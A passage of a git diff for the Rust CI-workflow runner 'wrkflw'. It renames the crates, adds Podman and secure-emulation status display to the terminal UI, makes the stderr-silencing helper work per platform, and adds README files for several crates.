.contains(&app.log_search_query.to_lowercase())
|
||||
};
|
||||
|
||||
passes_filter && matches_search
|
||||
})
|
||||
.cloned()
|
||||
.collect::<Vec<String>>()
|
||||
} else {
|
||||
all_logs.clone() // Clone to avoid moving all_logs
|
||||
};
|
||||
// Use processed logs from background thread instead of processing on every frame
|
||||
let filtered_logs = &app.processed_logs;
|
||||
|
||||
// Create a table for logs for better organization
|
||||
let header_cells = ["Time", "Type", "Message"]
|
||||
@@ -189,109 +152,10 @@ pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, a
|
||||
.style(Style::default().add_modifier(Modifier::BOLD))
|
||||
.height(1);
|
||||
|
||||
let rows = filtered_logs.iter().map(|log_line| {
|
||||
// Parse log line to extract timestamp, type and message
|
||||
|
||||
// Extract timestamp from log format [HH:MM:SS]
|
||||
let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let end = log_line.find(']').unwrap_or(0);
|
||||
if end > 1 {
|
||||
log_line[1..end].to_string()
|
||||
} else {
|
||||
"??:??:??".to_string() // Show placeholder for malformed logs
|
||||
}
|
||||
} else {
|
||||
"??:??:??".to_string() // Show placeholder for malformed logs
|
||||
};
|
||||
|
||||
let (log_type, log_style, _) =
|
||||
if log_line.contains("Error") || log_line.contains("error") || log_line.contains("❌")
|
||||
{
|
||||
("ERROR", Style::default().fg(Color::Red), log_line.as_str())
|
||||
} else if log_line.contains("Warning")
|
||||
|| log_line.contains("warning")
|
||||
|| log_line.contains("⚠️")
|
||||
{
|
||||
(
|
||||
"WARN",
|
||||
Style::default().fg(Color::Yellow),
|
||||
log_line.as_str(),
|
||||
)
|
||||
} else if log_line.contains("Success")
|
||||
|| log_line.contains("success")
|
||||
|| log_line.contains("✅")
|
||||
{
|
||||
(
|
||||
"SUCCESS",
|
||||
Style::default().fg(Color::Green),
|
||||
log_line.as_str(),
|
||||
)
|
||||
} else if log_line.contains("Running")
|
||||
|| log_line.contains("running")
|
||||
|| log_line.contains("⟳")
|
||||
{
|
||||
("INFO", Style::default().fg(Color::Cyan), log_line.as_str())
|
||||
} else if log_line.contains("Triggering") || log_line.contains("triggered") {
|
||||
(
|
||||
"TRIG",
|
||||
Style::default().fg(Color::Magenta),
|
||||
log_line.as_str(),
|
||||
)
|
||||
} else {
|
||||
("INFO", Style::default().fg(Color::Gray), log_line.as_str())
|
||||
};
|
||||
|
||||
// Extract content after timestamp
|
||||
let content = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let start = log_line.find(']').unwrap_or(0) + 1;
|
||||
log_line[start..].trim()
|
||||
} else {
|
||||
log_line.as_str()
|
||||
};
|
||||
|
||||
// Highlight search matches in content if search is active
|
||||
let mut content_spans = Vec::new();
|
||||
if !app.log_search_query.is_empty() {
|
||||
let lowercase_content = content.to_lowercase();
|
||||
let lowercase_query = app.log_search_query.to_lowercase();
|
||||
|
||||
if lowercase_content.contains(&lowercase_query) {
|
||||
let mut last_idx = 0;
|
||||
while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
|
||||
let real_idx = last_idx + idx;
|
||||
|
||||
// Add text before match
|
||||
if real_idx > last_idx {
|
||||
content_spans.push(Span::raw(content[last_idx..real_idx].to_string()));
|
||||
}
|
||||
|
||||
// Add matched text with highlight
|
||||
let match_end = real_idx + app.log_search_query.len();
|
||||
content_spans.push(Span::styled(
|
||||
content[real_idx..match_end].to_string(),
|
||||
Style::default().bg(Color::Yellow).fg(Color::Black),
|
||||
));
|
||||
|
||||
last_idx = match_end;
|
||||
}
|
||||
|
||||
// Add remaining text after last match
|
||||
if last_idx < content.len() {
|
||||
content_spans.push(Span::raw(content[last_idx..].to_string()));
|
||||
}
|
||||
} else {
|
||||
content_spans.push(Span::raw(content));
|
||||
}
|
||||
} else {
|
||||
content_spans.push(Span::raw(content));
|
||||
}
|
||||
|
||||
Row::new(vec![
|
||||
Cell::from(timestamp),
|
||||
Cell::from(log_type).style(log_style),
|
||||
Cell::from(Line::from(content_spans)),
|
||||
])
|
||||
});
|
||||
// Convert processed logs to table rows - this is now very fast since logs are pre-processed
|
||||
let rows = filtered_logs
|
||||
.iter()
|
||||
.map(|processed_log| processed_log.to_row());
|
||||
|
||||
let content_idx = if show_search_bar { 2 } else { 1 };
|
||||
|
||||
|
||||
@@ -15,7 +15,7 @@ use std::io;
|
||||
pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
|
||||
// Check if help should be shown as an overlay
|
||||
if app.show_help {
|
||||
help_overlay::render_help_overlay(f);
|
||||
help_overlay::render_help_overlay(f, app.help_scroll);
|
||||
return;
|
||||
}
|
||||
|
||||
@@ -48,7 +48,7 @@ pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
|
||||
}
|
||||
}
|
||||
2 => logs_tab::render_logs_tab(f, app, main_chunks[1]),
|
||||
3 => help_overlay::render_help_tab(f, main_chunks[1]),
|
||||
3 => help_overlay::render_help_content(f, main_chunks[1], app.help_scroll),
|
||||
_ => {}
|
||||
}
|
||||
|
||||
|
||||
@@ -1,6 +1,5 @@
|
||||
// Status bar rendering
|
||||
use crate::app::App;
|
||||
use executor::RuntimeType;
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Alignment, Rect},
|
||||
@@ -10,6 +9,7 @@ use ratatui::{
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
use wrkflw_executor::RuntimeType;
|
||||
|
||||
// Render the status bar
|
||||
pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, area: Rect) {
|
||||
@@ -40,38 +40,84 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
|
||||
Style::default()
|
||||
.bg(match app.runtime_type {
|
||||
RuntimeType::Docker => Color::Blue,
|
||||
RuntimeType::Emulation => Color::Magenta,
|
||||
RuntimeType::Podman => Color::Cyan,
|
||||
RuntimeType::SecureEmulation => Color::Green,
|
||||
RuntimeType::Emulation => Color::Red,
|
||||
})
|
||||
.fg(Color::White),
|
||||
));
|
||||
|
||||
// Add Docker status if relevant
|
||||
if app.runtime_type == RuntimeType::Docker {
|
||||
// Check Docker silently using safe FD redirection
|
||||
let is_docker_available =
|
||||
match utils::fd::with_stderr_to_null(executor::docker::is_available) {
|
||||
// Add container runtime status if relevant
|
||||
match app.runtime_type {
|
||||
RuntimeType::Docker => {
|
||||
// Check Docker silently using safe FD redirection
|
||||
let is_docker_available = match wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::docker::is_available,
|
||||
) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::debug("Failed to redirect stderr when checking Docker availability.");
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Docker availability.",
|
||||
);
|
||||
false
|
||||
}
|
||||
};
|
||||
|
||||
status_items.push(Span::raw(" "));
|
||||
status_items.push(Span::styled(
|
||||
if is_docker_available {
|
||||
" Docker: Connected "
|
||||
} else {
|
||||
" Docker: Not Available "
|
||||
},
|
||||
Style::default()
|
||||
.bg(if is_docker_available {
|
||||
Color::Green
|
||||
status_items.push(Span::raw(" "));
|
||||
status_items.push(Span::styled(
|
||||
if is_docker_available {
|
||||
" Docker: Connected "
|
||||
} else {
|
||||
Color::Red
|
||||
})
|
||||
.fg(Color::White),
|
||||
));
|
||||
" Docker: Not Available "
|
||||
},
|
||||
Style::default()
|
||||
.bg(if is_docker_available {
|
||||
Color::Green
|
||||
} else {
|
||||
Color::Red
|
||||
})
|
||||
.fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::Podman => {
|
||||
// Check Podman silently using safe FD redirection
|
||||
let is_podman_available = match wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::podman::is_available,
|
||||
) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Podman availability.",
|
||||
);
|
||||
false
|
||||
}
|
||||
};
|
||||
|
||||
status_items.push(Span::raw(" "));
|
||||
status_items.push(Span::styled(
|
||||
if is_podman_available {
|
||||
" Podman: Connected "
|
||||
} else {
|
||||
" Podman: Not Available "
|
||||
},
|
||||
Style::default()
|
||||
.bg(if is_podman_available {
|
||||
Color::Green
|
||||
} else {
|
||||
Color::Red
|
||||
})
|
||||
.fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::SecureEmulation => {
|
||||
status_items.push(Span::styled(
|
||||
" 🔒SECURE ",
|
||||
Style::default().bg(Color::Green).fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::Emulation => {
|
||||
// No need to check anything for emulation mode
|
||||
}
|
||||
}
|
||||
|
||||
// Add validation/execution mode
|
||||
@@ -122,7 +168,7 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
|
||||
}
|
||||
2 => {
|
||||
// For logs tab, show scrolling instructions
|
||||
let log_count = app.logs.len() + logging::get_logs().len();
|
||||
let log_count = app.logs.len() + wrkflw_logging::get_logs().len();
|
||||
if log_count > 0 {
|
||||
// Convert to a static string for consistent return type
|
||||
let scroll_text = format!(
|
||||
@@ -135,7 +181,7 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
|
||||
"[No logs to display]"
|
||||
}
|
||||
}
|
||||
3 => "[?] Toggle help overlay",
|
||||
3 => "[↑/↓] Scroll help [?] Toggle help overlay",
|
||||
_ => "",
|
||||
};
|
||||
status_items.push(Span::styled(
|
||||
|
||||
@@ -1,15 +1,22 @@
|
||||
[package]
|
||||
name = "utils"
|
||||
name = "wrkflw-utils"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "utility functions for wrkflw"
|
||||
description = "Utility functions for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
models = { path = "../models" }
|
||||
wrkflw-models.workspace = true
|
||||
|
||||
# External dependencies
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
|
||||
[target.'cfg(unix)'.dependencies]
|
||||
nix.workspace = true
|
||||
|
||||
21
crates/utils/README.md
Normal file
21
crates/utils/README.md
Normal file
@@ -0,0 +1,21 @@
|
||||
## wrkflw-utils
|
||||
|
||||
Shared helpers used across crates.
|
||||
|
||||
- Workflow file detection (`.github/workflows/*.yml`, `.gitlab-ci.yml`)
|
||||
- File-descriptor redirection utilities for silencing noisy subprocess output (Unix only; Windows support is limited)
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use std::path::Path;
|
||||
use wrkflw_utils::{is_workflow_file, fd::with_stderr_to_null};
|
||||
|
||||
assert!(is_workflow_file(Path::new(".github/workflows/ci.yml")));
|
||||
|
||||
let value = with_stderr_to_null(|| {
|
||||
eprintln!("this is hidden on Unix, visible on Windows");
|
||||
42
|
||||
}).unwrap();
|
||||
assert_eq!(value, 42);
|
||||
```
|
||||
@@ -35,78 +35,145 @@ pub fn is_workflow_file(path: &Path) -> bool {
|
||||
}
|
||||
|
||||
/// Module for safely handling file descriptor redirection
|
||||
///
|
||||
/// On Unix systems (Linux, macOS), this module provides true file descriptor
|
||||
/// redirection by duplicating stderr and redirecting it to /dev/null.
|
||||
///
|
||||
/// On Windows systems, the redirection functionality is limited due to platform
|
||||
/// differences in file descriptor handling. The functions will execute without
|
||||
/// error but stderr may not be fully suppressed.
|
||||
pub mod fd {
|
||||
use nix::fcntl::{open, OFlag};
|
||||
use nix::sys::stat::Mode;
|
||||
use nix::unistd::{close, dup, dup2};
|
||||
use std::io::{self, Result};
|
||||
use std::os::unix::io::RawFd;
|
||||
use std::path::Path;
|
||||
|
||||
/// Standard file descriptors
|
||||
const STDERR_FILENO: RawFd = 2;
|
||||
use std::io::Result;
|
||||
|
||||
/// Represents a redirected stderr that can be restored
|
||||
pub struct RedirectedStderr {
|
||||
original_fd: Option<RawFd>,
|
||||
null_fd: Option<RawFd>,
|
||||
#[cfg(unix)]
|
||||
original_fd: Option<std::os::unix::io::RawFd>,
|
||||
#[cfg(unix)]
|
||||
null_fd: Option<std::os::unix::io::RawFd>,
|
||||
#[cfg(windows)]
|
||||
_phantom: std::marker::PhantomData<()>,
|
||||
}
|
||||
|
||||
impl RedirectedStderr {
|
||||
/// Creates a new RedirectedStderr that redirects stderr to /dev/null
|
||||
pub fn to_null() -> Result<Self> {
|
||||
// Duplicate the current stderr fd
|
||||
let stderr_backup = match dup(STDERR_FILENO) {
|
||||
Ok(fd) => fd,
|
||||
Err(e) => return Err(io::Error::other(e)),
|
||||
};
|
||||
#[cfg(unix)]
|
||||
mod unix_impl {
|
||||
use super::*;
|
||||
use nix::fcntl::{open, OFlag};
|
||||
use nix::sys::stat::Mode;
|
||||
use nix::unistd::{close, dup, dup2};
|
||||
use std::io;
|
||||
use std::os::unix::io::RawFd;
|
||||
use std::path::Path;
|
||||
|
||||
// Open /dev/null
|
||||
let null_fd = match open(Path::new("/dev/null"), OFlag::O_WRONLY, Mode::empty()) {
|
||||
Ok(fd) => fd,
|
||||
Err(e) => {
|
||||
/// Standard file descriptors
|
||||
const STDERR_FILENO: RawFd = 2;
|
||||
|
||||
impl RedirectedStderr {
|
||||
/// Creates a new RedirectedStderr that redirects stderr to /dev/null
|
||||
pub fn to_null() -> Result<Self> {
|
||||
// Duplicate the current stderr fd
|
||||
let stderr_backup = match dup(STDERR_FILENO) {
|
||||
Ok(fd) => fd,
|
||||
Err(e) => return Err(io::Error::other(e)),
|
||||
};
|
||||
|
||||
// Open /dev/null
|
||||
let null_fd = match open(Path::new("/dev/null"), OFlag::O_WRONLY, Mode::empty()) {
|
||||
Ok(fd) => fd,
|
||||
Err(e) => {
|
||||
let _ = close(stderr_backup); // Clean up on error
|
||||
return Err(io::Error::other(e));
|
||||
}
|
||||
};
|
||||
|
||||
// Redirect stderr to /dev/null
|
||||
if let Err(e) = dup2(null_fd, STDERR_FILENO) {
|
||||
let _ = close(stderr_backup); // Clean up on error
|
||||
let _ = close(null_fd);
|
||||
return Err(io::Error::other(e));
|
||||
}
|
||||
};
|
||||
|
||||
// Redirect stderr to /dev/null
|
||||
if let Err(e) = dup2(null_fd, STDERR_FILENO) {
|
||||
let _ = close(stderr_backup); // Clean up on error
|
||||
let _ = close(null_fd);
|
||||
return Err(io::Error::other(e));
|
||||
Ok(RedirectedStderr {
|
||||
original_fd: Some(stderr_backup),
|
||||
null_fd: Some(null_fd),
|
||||
})
|
||||
}
|
||||
|
||||
Ok(RedirectedStderr {
|
||||
original_fd: Some(stderr_backup),
|
||||
null_fd: Some(null_fd),
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
impl Drop for RedirectedStderr {
|
||||
/// Automatically restores stderr when the RedirectedStderr is dropped
|
||||
fn drop(&mut self) {
|
||||
if let Some(orig_fd) = self.original_fd.take() {
|
||||
// Restore the original stderr
|
||||
let _ = dup2(orig_fd, STDERR_FILENO);
|
||||
let _ = close(orig_fd);
|
||||
}
|
||||
impl Drop for RedirectedStderr {
|
||||
/// Automatically restores stderr when the RedirectedStderr is dropped
|
||||
fn drop(&mut self) {
|
||||
if let Some(orig_fd) = self.original_fd.take() {
|
||||
// Restore the original stderr
|
||||
let _ = dup2(orig_fd, STDERR_FILENO);
|
||||
let _ = close(orig_fd);
|
||||
}
|
||||
|
||||
// Close the null fd
|
||||
if let Some(null_fd) = self.null_fd.take() {
|
||||
let _ = close(null_fd);
|
||||
// Close the null fd
|
||||
if let Some(null_fd) = self.null_fd.take() {
|
||||
let _ = close(null_fd);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Run a function with stderr redirected to /dev/null, then restore stderr
|
||||
#[cfg(windows)]
|
||||
mod windows_impl {
|
||||
use super::*;
|
||||
|
||||
impl RedirectedStderr {
|
||||
/// Creates a new RedirectedStderr that redirects stderr to NUL on Windows
|
||||
pub fn to_null() -> Result<Self> {
|
||||
// On Windows, we can't easily redirect stderr at the file descriptor level
|
||||
// like we can on Unix systems. This is a simplified implementation that
|
||||
// doesn't actually redirect but provides the same interface.
|
||||
// The actual stderr suppression will need to be handled differently on Windows.
|
||||
Ok(RedirectedStderr {
|
||||
_phantom: std::marker::PhantomData,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
impl Drop for RedirectedStderr {
|
||||
/// No-op drop implementation for Windows
|
||||
fn drop(&mut self) {
|
||||
// Nothing to restore on Windows in this simplified implementation
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Run a function with stderr redirected to /dev/null (Unix) or suppressed (Windows), then restore stderr
|
||||
///
|
||||
/// # Platform Support
|
||||
/// - **Unix (Linux, macOS)**: Fully supported - stderr is redirected to /dev/null
|
||||
/// - **Windows**: Limited support - function executes but stderr may be visible
|
||||
///
|
||||
/// # Example
|
||||
/// ```
|
||||
/// use wrkflw_utils::fd::with_stderr_to_null;
|
||||
///
|
||||
/// let result = with_stderr_to_null(|| {
|
||||
/// eprintln!("This will be hidden on Unix");
|
||||
/// 42
|
||||
/// }).unwrap();
|
||||
/// assert_eq!(result, 42);
|
||||
/// ```
|
||||
pub fn with_stderr_to_null<F, T>(f: F) -> Result<T>
|
||||
where
|
||||
F: FnOnce() -> T,
|
||||
{
|
||||
let _redirected = RedirectedStderr::to_null()?;
|
||||
Ok(f())
|
||||
#[cfg(unix)]
|
||||
{
|
||||
let _redirected = RedirectedStderr::to_null()?;
|
||||
Ok(f())
|
||||
}
|
||||
#[cfg(windows)]
|
||||
{
|
||||
// On Windows, we can't easily redirect stderr at the FD level,
|
||||
// so we just run the function without redirection.
|
||||
// This means stderr won't be suppressed on Windows, but the function will work.
|
||||
Ok(f())
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -116,15 +183,16 @@ mod tests {
|
||||
|
||||
#[test]
|
||||
fn test_fd_redirection() {
|
||||
// This test will write to stderr, which should be redirected
|
||||
// This test will write to stderr, which should be redirected on Unix
|
||||
// On Windows, it will just run normally without redirection
|
||||
let result = fd::with_stderr_to_null(|| {
|
||||
// This would normally appear in stderr
|
||||
eprintln!("This should be redirected to /dev/null");
|
||||
// This would normally appear in stderr (suppressed on Unix, visible on Windows)
|
||||
eprintln!("This should be redirected to /dev/null on Unix");
|
||||
// Return a test value to verify the function passes through the result
|
||||
42
|
||||
});
|
||||
|
||||
// The function should succeed and return our test value
|
||||
// The function should succeed and return our test value on both platforms
|
||||
assert!(result.is_ok());
|
||||
assert_eq!(result.unwrap(), 42);
|
||||
}
|
||||
|
||||
@@ -1,14 +1,19 @@
|
||||
[package]
|
||||
name = "validators"
|
||||
name = "wrkflw-validators"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "validation functionality for wrkflw"
|
||||
description = "Workflow validation functionality for wrkflw execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
models = { path = "../models" }
|
||||
matrix = { path = "../matrix" }
|
||||
wrkflw-models.workspace = true
|
||||
wrkflw-matrix.workspace = true
|
||||
|
||||
# External dependencies
|
||||
serde.workspace = true
|
||||
|
||||
29
crates/validators/README.md
Normal file
29
crates/validators/README.md
Normal file
@@ -0,0 +1,29 @@
|
||||
## wrkflw-validators
|
||||
|
||||
Validation utilities for workflows and steps.
|
||||
|
||||
- Validates GitHub Actions sections: jobs, steps, actions references, triggers
|
||||
- GitLab pipeline validation helpers
|
||||
- Matrix-specific validation
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use serde_yaml::Value;
|
||||
use wrkflw_models::ValidationResult;
|
||||
use wrkflw_validators::{validate_jobs, validate_triggers};
|
||||
|
||||
let yaml: Value = serde_yaml::from_str(r#"name: demo
|
||||
on: [workflow_dispatch]
|
||||
jobs: { build: { runs-on: ubuntu-latest, steps: [] } }
|
||||
"#).unwrap();
|
||||
|
||||
let mut res = ValidationResult::new();
|
||||
if let Some(on) = yaml.get("on") {
|
||||
validate_triggers(on, &mut res);
|
||||
}
|
||||
if let Some(jobs) = yaml.get("jobs") {
|
||||
validate_jobs(jobs, &mut res);
|
||||
}
|
||||
assert!(res.is_valid);
|
||||
```
|
||||
@@ -1,4 +1,4 @@
|
||||
use models::ValidationResult;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
pub fn validate_action_reference(
|
||||
action_ref: &str,
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
use models::gitlab::{Job, Pipeline};
|
||||
use models::ValidationResult;
|
||||
use std::collections::HashMap;
|
||||
use wrkflw_models::gitlab::{Job, Pipeline};
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
/// Validate a GitLab CI/CD pipeline
|
||||
pub fn validate_gitlab_pipeline(pipeline: &Pipeline) -> ValidationResult {
|
||||
@@ -65,7 +65,7 @@ fn validate_jobs(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
|
||||
// Check retry configuration
|
||||
if let Some(retry) = &job.retry {
|
||||
match retry {
|
||||
models::gitlab::Retry::MaxAttempts(attempts) => {
|
||||
wrkflw_models::gitlab::Retry::MaxAttempts(attempts) => {
|
||||
if *attempts > 10 {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has excessive retry count: {}. Consider reducing to avoid resource waste",
|
||||
@@ -73,7 +73,7 @@ fn validate_jobs(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
|
||||
));
|
||||
}
|
||||
}
|
||||
models::gitlab::Retry::Detailed { max, when: _ } => {
|
||||
wrkflw_models::gitlab::Retry::Detailed { max, when: _ } => {
|
||||
if *max > 10 {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has excessive retry count: {}. Consider reducing to avoid resource waste",
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
use crate::{validate_matrix, validate_steps};
|
||||
use models::ValidationResult;
|
||||
use serde_yaml::Value;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
pub fn validate_jobs(jobs: &Value, result: &mut ValidationResult) {
|
||||
if let Value::Mapping(jobs_map) = jobs {
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
use models::ValidationResult;
|
||||
use serde_yaml::Value;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
pub fn validate_matrix(matrix: &Value, result: &mut ValidationResult) {
|
||||
// Check if matrix is a mapping
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
use crate::validate_action_reference;
|
||||
use models::ValidationResult;
|
||||
use serde_yaml::Value;
|
||||
use std::collections::HashSet;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
pub fn validate_steps(steps: &[Value], job_name: &str, result: &mut ValidationResult) {
|
||||
let mut step_ids: HashSet<String> = HashSet::new();
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
use models::ValidationResult;
|
||||
use serde_yaml::Value;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
pub fn validate_triggers(on: &Value, result: &mut ValidationResult) {
|
||||
let valid_events = vec![
|
||||
|
||||
@@ -12,18 +12,18 @@ license.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Workspace crates
|
||||
models = { path = "../models" }
|
||||
executor = { path = "../executor" }
|
||||
github = { path = "../github" }
|
||||
gitlab = { path = "../gitlab" }
|
||||
logging = { path = "../logging" }
|
||||
matrix = { path = "../matrix" }
|
||||
parser = { path = "../parser" }
|
||||
runtime = { path = "../runtime" }
|
||||
ui = { path = "../ui" }
|
||||
utils = { path = "../utils" }
|
||||
validators = { path = "../validators" }
|
||||
evaluator = { path = "../evaluator" }
|
||||
wrkflw-models.workspace = true
|
||||
wrkflw-executor.workspace = true
|
||||
wrkflw-github.workspace = true
|
||||
wrkflw-gitlab.workspace = true
|
||||
wrkflw-logging.workspace = true
|
||||
wrkflw-matrix.workspace = true
|
||||
wrkflw-parser.workspace = true
|
||||
wrkflw-runtime.workspace = true
|
||||
wrkflw-ui.workspace = true
|
||||
wrkflw-utils.workspace = true
|
||||
wrkflw-validators.workspace = true
|
||||
wrkflw-evaluator.workspace = true
|
||||
|
||||
# External dependencies
|
||||
clap.workspace = true
|
||||
@@ -62,4 +62,4 @@ path = "src/lib.rs"
|
||||
|
||||
[[bin]]
|
||||
name = "wrkflw"
|
||||
path = "src/main.rs"
|
||||
path = "src/main.rs"
|
||||
|
||||
112
crates/wrkflw/README.md
Normal file
112
crates/wrkflw/README.md
Normal file
@@ -0,0 +1,112 @@
|
||||
## WRKFLW (CLI and Library)
|
||||
|
||||
This crate provides the `wrkflw` command-line interface and a thin library surface that ties together all WRKFLW subcrates. It lets you validate and execute GitHub Actions workflows and GitLab CI pipelines locally, with a built-in TUI for an interactive experience.
|
||||
|
||||
- **Validate**: Lints structure and common mistakes in workflow/pipeline files
|
||||
- **Run**: Executes jobs locally using Docker, Podman, or emulation (no containers)
|
||||
- **TUI**: Interactive terminal UI for browsing workflows, running, and viewing logs
|
||||
- **Trigger**: Manually trigger remote runs on GitHub/GitLab
|
||||
|
||||
### Installation
|
||||
|
||||
```bash
|
||||
cargo install wrkflw
|
||||
```
|
||||
|
||||
### Quick start
|
||||
|
||||
```bash
|
||||
# Launch the TUI (auto-loads .github/workflows)
|
||||
wrkflw
|
||||
|
||||
# Validate all workflows in the default directory
|
||||
wrkflw validate
|
||||
|
||||
# Validate a specific file or directory
|
||||
wrkflw validate .github/workflows/ci.yml
|
||||
wrkflw validate path/to/workflows
|
||||
|
||||
# Validate multiple files and/or directories
|
||||
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows
|
||||
|
||||
# Run a workflow (Docker by default)
|
||||
wrkflw run .github/workflows/ci.yml
|
||||
|
||||
# Use Podman or emulation instead of Docker
|
||||
wrkflw run --runtime podman .github/workflows/ci.yml
|
||||
wrkflw run --runtime emulation .github/workflows/ci.yml
|
||||
|
||||
# Open the TUI explicitly
|
||||
wrkflw tui
|
||||
wrkflw tui --runtime podman
|
||||
```
|
||||
|
||||
### Commands
|
||||
|
||||
- **validate**: Validate workflow/pipeline files and/or directories
|
||||
- GitHub (default): `.github/workflows/*.yml`
|
||||
- GitLab: `.gitlab-ci.yml` or files ending with `gitlab-ci.yml`
|
||||
- Accepts multiple paths in a single invocation
|
||||
- Exit code behavior (by default): `1` when any validation failure is detected
|
||||
- Flags: `--gitlab`, `--exit-code`, `--no-exit-code`, `--verbose`
|
||||
|
||||
- **run**: Execute a workflow or pipeline locally
|
||||
- Runtimes: `docker` (default), `podman`, `emulation`
|
||||
- Flags: `--runtime`, `--preserve-containers-on-failure`, `--gitlab`, `--verbose`
|
||||
|
||||
- **tui**: Interactive terminal interface
|
||||
- Browse workflows, execute, and inspect logs and job details
|
||||
|
||||
- **trigger**: Trigger a GitHub workflow (requires `GITHUB_TOKEN`)
|
||||
- **trigger-gitlab**: Trigger a GitLab pipeline (requires `GITLAB_TOKEN`)
|
||||
- **list**: Show detected workflows and pipelines in the repo
|
||||
|
||||
### Environment variables
|
||||
|
||||
- **GITHUB_TOKEN**: Required for `trigger` when calling GitHub
|
||||
- **GITLAB_TOKEN**: Required for `trigger-gitlab` (api scope)
|
||||
|
||||
### Exit codes
|
||||
|
||||
- `validate`: `0` if all pass; `1` if any fail (unless `--no-exit-code`)
|
||||
- `run`: `0` on success, `1` if execution fails
|
||||
|
||||
### Library usage
|
||||
|
||||
This crate re-exports subcrates for convenience if you want to embed functionality:
|
||||
|
||||
```rust
|
||||
use std::path::Path;
|
||||
use wrkflw::executor::{execute_workflow, ExecutionConfig, RuntimeType};
|
||||
|
||||
# tokio_test::block_on(async {
|
||||
let cfg = ExecutionConfig {
|
||||
runtime_type: RuntimeType::Docker,
|
||||
verbose: true,
|
||||
preserve_containers_on_failure: false,
|
||||
};
|
||||
let result = execute_workflow(Path::new(".github/workflows/ci.yml"), cfg).await?;
|
||||
println!("status: {:?}", result.summary_status);
|
||||
# Ok::<_, Box<dyn std::error::Error>>(())
|
||||
# })?;
|
||||
```
|
||||
|
||||
You can also run the TUI programmatically:
|
||||
|
||||
```rust
|
||||
use std::path::PathBuf;
|
||||
use wrkflw::executor::RuntimeType;
|
||||
use wrkflw::ui::run_wrkflw_tui;
|
||||
|
||||
# tokio_test::block_on(async {
|
||||
let path = PathBuf::from(".github/workflows");
|
||||
run_wrkflw_tui(Some(&path), RuntimeType::Docker, true, false).await?;
|
||||
# Ok::<_, Box<dyn std::error::Error>>(())
|
||||
# })?;
|
||||
```
|
||||
|
||||
### Notes
|
||||
|
||||
- See the repository root README for feature details, limitations, and a full walkthrough.
|
||||
- Service containers and advanced Actions features are best supported in Docker/Podman modes.
|
||||
- Emulation mode skips containerized steps and runs commands on the host.
|
||||
@@ -1,12 +1,12 @@
|
||||
pub use evaluator;
|
||||
pub use executor;
|
||||
pub use github;
|
||||
pub use gitlab;
|
||||
pub use logging;
|
||||
pub use matrix;
|
||||
pub use models;
|
||||
pub use parser;
|
||||
pub use runtime;
|
||||
pub use ui;
|
||||
pub use utils;
|
||||
pub use validators;
|
||||
pub use wrkflw_evaluator as evaluator;
|
||||
pub use wrkflw_executor as executor;
|
||||
pub use wrkflw_github as github;
|
||||
pub use wrkflw_gitlab as gitlab;
|
||||
pub use wrkflw_logging as logging;
|
||||
pub use wrkflw_matrix as matrix;
|
||||
pub use wrkflw_models as models;
|
||||
pub use wrkflw_parser as parser;
|
||||
pub use wrkflw_runtime as runtime;
|
||||
